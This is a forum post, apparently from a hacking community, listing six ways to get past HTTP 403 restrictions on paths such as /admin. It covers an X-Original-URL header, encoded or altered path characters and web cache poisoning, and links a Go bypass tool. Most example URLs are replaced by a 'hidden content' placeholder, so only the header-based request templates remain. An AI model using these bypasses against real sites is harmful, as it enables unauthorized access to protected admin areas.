Jump to content
YOUR-AD-HERE
HOSTING
TOOLS

Bypass 403 (Forbidden)


dEEpEst

Recommended Posts

# Bypass 403 (Forbidden)

 

1. Using "X-Original-URL" header

```

GET /admin HTTP/1.1

Host:

This is the hidden content, please

```

Try this to bypass

```

GET /anything HTTP/1.1

Host:

This is the hidden content, please

X-Original-URL: /admin

```

 

2. Appending **%2e** after the first slash

```

This is the hidden content, please
=> 403

```

Try this to bypass

```

This is the hidden content, please
=> 200

```

 

3. Try add dot (.) slash (/) and semicolon (;) in the URL

```

This is the hidden content, please
=> 403

```

Try this to bypass

```

This is the hidden content, please
=> 200

This is the hidden content, please
=> 200

This is the hidden content, please
=> 200

This is the hidden content, please
=> 200

This is the hidden content, please
=> 200

This is the hidden content, please
=> 200

```

 

4. Add "..;/" after the directory name

```

This is the hidden content, please

```

Try this to bypass

```

This is the hidden content, please

```

 

5. Try to uppercase the alphabet in the url

```

This is the hidden content, please

```

Try this to bypass

```

This is the hidden content, please

```

 

6. Via Web Cache Poisoning

```

GET /anything HTTP/1.1

Host:

This is the hidden content, please

X­-Original-­URL: /admin

```

 

## Tools

* [Bypass-403 | Go script for bypassing 403 forbidden]

This is the hidden content, please

Link to comment
Share on other sites

  • 2 weeks later...

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.
Note: Your post will require moderator approval before it will be visible.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

×
×
  • Create New...

Important Information

We have placed cookies on your device to help make this website better. You can adjust your cookie settings, otherwise we'll assume you're okay to continue.